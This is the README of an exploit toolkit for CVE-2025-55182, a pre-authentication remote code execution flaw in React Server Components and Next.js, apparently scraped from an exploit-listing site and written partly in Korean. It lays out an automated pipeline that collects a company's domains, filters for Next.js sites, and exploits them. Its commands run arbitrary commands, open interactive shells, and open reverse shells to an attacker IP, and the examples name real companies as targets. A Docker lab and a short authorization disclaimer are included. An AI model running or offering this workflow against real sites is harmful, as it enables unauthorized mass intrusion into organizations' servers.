Share
## https://sploitus.com/exploit?id=C5A21AEF-804D-5AA7-856A-81052E267A3A
# CVE-2025-55182 Exploit Toolkit

React Server Components Pre-Authentication RCE (CVSS 10.0)

## Directory Structure

```
C:\Users\king0\Desktop\POC\2025\55182\
β”‚
β”œβ”€β”€ tools/                          # 자체 개발 도ꡬ
β”‚   β”œβ”€β”€ auto_exploit.py             # 전체 μžλ™ν™” νŒŒμ΄ν”„λΌμΈ
β”‚   β”œβ”€β”€ multi_scanner.py            # λ©€ν‹° νƒ€κ²Ÿ μŠ€μΊλ„ˆ
β”‚   β”œβ”€β”€ domain_finder.py            # 도메인 탐색 (.com λ“±)
β”‚   β”œβ”€β”€ target_finder.py            # νƒ€κ²Ÿ 탐색 (crt.sh, Shodan)
β”‚   └── cve_2025_55182_workflow.py  # 핡심 μ΅μŠ€ν”Œλ‘œμž‡ λͺ¨λ“ˆ
β”‚
β”œβ”€β”€ poc/                            # GitHub POC λͺ¨μŒ
β”‚   β”œβ”€β”€ Chocapikk-CVE-2025-55182/   # Python exploit + Docker Lab
β”‚   β”œβ”€β”€ l4rm4nd-CVE-2025-55182/     # Docker lab + Nuclei template
β”‚   β”œβ”€β”€ react2shell-scanner/        # Node.js scanner (gensecaihq)
β”‚   └── whiteov3rflow-CVE-2025-55182-poc/  # Simple Python exploit
β”‚
β”œβ”€β”€ results/                        # μŠ€μΊ” κ²°κ³Ό
β”‚   └── results_*/                  # 기업별 κ²°κ³Ό 폴더
β”‚
└── README.md
```

---

## Quick Start

### 1. μžλ™ν™” νŒŒμ΄ν”„λΌμΈ (κ°€μž₯ κ°„νŽΈ)

```bash
cd tools
python auto_exploit.py -t kyobo
python auto_exploit.py -t samsung -v
```

μžλ™μœΌλ‘œ:
1. 도메인 μˆ˜μ§‘ (crt.sh, μ„œλΈŒλ„λ©”μΈ 생성)
2. Next.js μ‚¬μ΄νŠΈ 필터링
3. 취약점 μŠ€μΊ”
4. 취약점 검증
5. λ³΄κ³ μ„œ 생성

### 2. λ©€ν‹° μŠ€μΊλ„ˆ (URL 볡뢙)

```bash
cd tools
python multi_scanner.py
```

URL 볡뢙 ν›„ Enter 두 번:
```
https://target1.com
https://target2.com
https://target3.com

```

### 3. 단일 νƒ€κ²Ÿ μ΅μŠ€ν”Œλ‘œμž‡

```bash
cd tools

# μŠ€μΊ”λ§Œ
python cve_2025_55182_workflow.py -u https://target.com --scan-only

# 검증
python cve_2025_55182_workflow.py -u https://target.com --verify-only

# λͺ…λ Ή μ‹€ν–‰
python cve_2025_55182_workflow.py -u https://target.com -c "id"

# μΈν„°λž™ν‹°λΈŒ μ‰˜
python cve_2025_55182_workflow.py -u https://target.com --shell

# λ¦¬λ²„μŠ€ μ‰˜
python cve_2025_55182_workflow.py -u https://target.com --reverse -l YOUR_IP -p 4444
```

---

## Tools Overview

| 도ꡬ | μ„€λͺ… | μ‚¬μš©λ²• |
|------|------|--------|
| `auto_exploit.py` | 전체 μžλ™ν™” | `-t κΈ°μ—…λͺ…` |
| `multi_scanner.py` | λ©€ν‹° νƒ€κ²Ÿ μŠ€μΊ” | URL 볡뢙 λ˜λŠ” `-f file.txt` |
| `domain_finder.py` | .com 도메인 탐색 | `--tranco`, `--known` |
| `target_finder.py` | μ„œλΈŒλ„λ©”μΈ 탐색 | `--crtsh -d domain.com` |
| `cve_2025_55182_workflow.py` | 핡심 μ΅μŠ€ν”Œλ‘œμž‡ | `-u URL -c "cmd"` |

---

## Lab Environment (ν…ŒμŠ€νŠΈμš©)

```bash
# μ·¨μ•½ν•œ ν™˜κ²½ μ‹€ν–‰
docker run --rm -p 3000:3000 ghcr.io/l4rm4nd/cve-2025-55182:latest

# ν…ŒμŠ€νŠΈ
cd tools
python cve_2025_55182_workflow.py -u http://127.0.0.1:3000 -c "id"
```

---

## Vulnerability Info

| Item | Value |
|------|-------|
| CVE | CVE-2025-55182 |
| CVSS | 10.0 (Critical) |
| Type | Pre-Auth RCE |
| Vector | Prototype Pollution β†’ RCE |
| Discovered | 2025-11-29 |

### Affected Versions

- **Next.js**: 15.0.0-15.5.6, 16.0.0-16.0.6
- **react-server-dom-***: 19.0.0, 19.1.0-19.1.1, 19.2.0

### Patched Versions

- **Next.js**: 15.0.5, 15.1.9, 15.2.6, ..., 16.0.7
- **react-server-dom-***: 19.0.1, 19.1.2, 19.2.1

---

## Requirements

```bash
pip install requests urllib3 colorama
```

---

## Disclaimer

For authorized security testing only. Obtain proper authorization before testing.